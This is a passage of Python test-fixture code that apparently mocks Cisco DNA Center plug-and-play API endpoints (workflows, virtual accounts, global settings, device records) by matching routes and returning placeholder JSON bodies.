'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_PNP_2499e9ad42e8ae5b(self):
    """Match the request path against the PNP 2499e9ad42e8ae5b route pattern."""
    return re.search(self.PNP_2499e9ad42e8ae5b_PATTERN, self.path)
def pnp_deregister_virtual_account_response(self):
    """Serve the mocked JSON payload for the PNP deregister-virtual-account endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_1e962af345b8b59f(self):
    """Match the request path against the PNP 1e962af345b8b59f route pattern."""
    return re.search(self.PNP_1e962af345b8b59f_PATTERN, self.path)
def pnp_add_virtual_account_response(self):
    """Serve the mocked JSON payload for the PNP add-virtual-account endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_21a6db2540298f55(self):
    """Match the request path against the PNP 21a6db2540298f55 route pattern."""
    return re.search(self.PNP_21a6db2540298f55_PATTERN, self.path)
def pnp_import_devicesinbulk_response(self):
    """Serve the mocked JSON payload for the PNP import-devices-in-bulk endpoint."""
    # Status line, then headers, then the serialized body.
    # NOTE: the dict literal is kept in its original key order so the
    # serialized JSON bytes match the generated fixture exactly.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'successList': [{'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'}], 'failureList': [{'index': 0, 'serialNum': 'string', 'id': 'string', 'msg': 'string'}]})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_3086c9624f498b85(self):
    """Match the request path against the PNP 3086c9624f498b85 route pattern."""
    return re.search(self.PNP_3086c9624f498b85_PATTERN, self.path)
def pnp_update_workflow_response(self):
    """Serve the mocked JSON payload for the PNP update-workflow endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_3cb24acb486b89d2(self):
    """Match the request path against the PNP 3cb24acb486b89d2 route pattern."""
    return re.search(self.PNP_3cb24acb486b89d2_PATTERN, self.path)
def pnp_get_smart_account_list_response(self):
    """Serve the mocked JSON payload for the PNP get-smart-account-list endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps(['string'])
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_5889fb844939a13b(self):
    """Match the request path against the PNP 5889fb844939a13b route pattern."""
    return re.search(self.PNP_5889fb844939a13b_PATTERN, self.path)
def pnp_claima_devicetoa_site_response(self):
    """Serve the mocked JSON payload for the PNP claim-a-device-to-a-site endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'response': 'string', 'version': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_6f9819e84178870c(self):
    """Match the request path against the PNP 6f9819e84178870c route pattern."""
    return re.search(self.PNP_6f9819e84178870c_PATTERN, self.path)
def pnp_update_pnp_server_profile_response(self):
    """Serve the mocked JSON payload for the PNP update-pnp-server-profile endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_7989f86846faaf99(self):
    """Match the request path against the PNP 7989f86846faaf99 route pattern."""
    return re.search(self.PNP_7989f86846faaf99_PATTERN, self.path)
def pnp_get_workflow_count_response(self):
    """Serve the mocked JSON payload for the PNP get-workflow-count endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'response': 0})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_70a479a6462a9496(self):
    """Match the request path against the PNP 70a479a6462a9496 route pattern."""
    return re.search(self.PNP_70a479a6462a9496_PATTERN, self.path)
def pnp_get_virtual_account_list_response(self):
    """Serve the mocked JSON payload for the PNP get-virtual-account-list endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps(['string'])
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_7e92f9eb46db8320(self):
    """Match the request path against the PNP 7e92f9eb46db8320 route pattern."""
    return re.search(self.PNP_7e92f9eb46db8320_PATTERN, self.path)
def pnp_get_pnpglobalsettings_response(self):
    """Serve the mocked JSON payload for the PNP get-pnp-global-settings endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'savaMappingList': [{'syncStatus': 'string', 'syncStartTime': 0, 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'lastSync': 0, 'tenantId': 'string', 'profile': {'port': 0, 'addressIpV4': 'string', 'addressFqdn': 'string', 'profileId': 'string', 'proxy': True, 'makeDefault': True, 'cert': 'string', 'name': 'string'}, 'token': 'string', 'expiry': 0, 'ccoUser': 'string', 'smartAccountId': 'string', 'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string'}], 'taskTimeOuts': {'imageDownloadTimeOut': 0, 'configTimeOut': 0, 'generalTimeOut': 0}, 'tenantId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'defaultProfile': {'fqdnAddresses': ['string'], 'proxy': True, 'cert': 'string', 'ipAddresses': ['string'], 'port': 0}, 'acceptEula': True, 'id': 'string', '_id': 'string', 'version': 0})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_8da0391947088a5a(self):
    """Match the request path against the PNP 8da0391947088a5a route pattern."""
    return re.search(self.PNP_8da0391947088a5a_PATTERN, self.path)
def pnp_update_pnpglobalsettings_response(self):
    """Serve the mocked JSON payload for the PNP update-pnp-global-settings endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'savaMappingList': [{'syncStatus': 'string', 'syncStartTime': 0, 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'lastSync': 0, 'tenantId': 'string', 'profile': {'port': 0, 'addressIpV4': 'string', 'addressFqdn': 'string', 'profileId': 'string', 'proxy': True, 'makeDefault': True, 'cert': 'string', 'name': 'string'}, 'token': 'string', 'expiry': 0, 'ccoUser': 'string', 'smartAccountId': 'string', 'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string'}], 'taskTimeOuts': {'imageDownloadTimeOut': 0, 'configTimeOut': 0, 'generalTimeOut': 0}, 'tenantId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'defaultProfile': {'fqdnAddresses': ['string'], 'proxy': True, 'cert': 'string', 'ipAddresses': ['string'], 'port': 0}, 'acceptEula': True, 'id': 'string', '_id': 'string', 'version': 0})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_848b5a7b4f9b8c12(self):
    """Match the request path against the PNP 848b5a7b4f9b8c12 route pattern."""
    return re.search(self.PNP_848b5a7b4f9b8c12_PATTERN, self.path)
def pnp_adda_workflow_response(self):
    """Serve the mocked JSON payload for the PNP add-a-workflow endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_a4b6c87a4ffb9efa(self):
    """Match the request path against the PNP a4b6c87a4ffb9efa route pattern."""
    return re.search(self.PNP_a4b6c87a4ffb9efa_PATTERN, self.path)
def pnp_sync_virtual_account_devices_response(self):
    """Serve the mocked JSON payload for the PNP sync-virtual-account-devices endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_9e857b5a4a0bbcdb(self):
    """Match the request path against the PNP 9e857b5a4a0bbcdb route pattern."""
    return re.search(self.PNP_9e857b5a4a0bbcdb_PATTERN, self.path)
def pnp_reset_device_response(self):
    """Serve the mocked JSON payload for the PNP reset-device endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_af8d7b0e470b8ae2(self):
    """Match the request path against the PNP af8d7b0e470b8ae2 route pattern."""
    return re.search(self.PNP_af8d7b0e470b8ae2_PATTERN, self.path)
def pnp_delete_workflow_by_id_response(self):
    """Serve the mocked JSON payload for the PNP delete-workflow-by-id endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_cdab9b474899ae06(self):
    """Match the request path against the PNP cdab9b474899ae06 route pattern."""
    return re.search(self.PNP_cdab9b474899ae06_PATTERN, self.path)
def pnp_delete_deviceby_idfrom_pnp_response(self):
    """Serve the mocked JSON payload for the PNP delete-device-by-id-from-pnp endpoint."""
    # Status line, then headers, then the serialized body.
    # NOTE: the dict literal is kept in its original key order so the
    # serialized JSON bytes match the generated fixture exactly.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_aeb4dad04a99bbe3(self):
    """Match the request path against the PNP aeb4dad04a99bbe3 route pattern."""
    return re.search(self.PNP_aeb4dad04a99bbe3_PATTERN, self.path)
def pnp_get_workflows_response(self):
    """Serve the mocked JSON payload for the PNP get-workflows endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps([{'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}])
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_bab6c9e5440885cc(self):
    """Match the request path against the PNP bab6c9e5440885cc route pattern."""
    return re.search(self.PNP_bab6c9e5440885cc_PATTERN, self.path)
def pnp_get_deviceby_id_response(self):
    """Serve the mocked JSON payload for the PNP get-device-by-id endpoint."""
    # Status line, then headers, then the serialized body.
    # NOTE: the dict literal is kept in its original key order so the
    # serialized JSON bytes match the generated fixture exactly.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 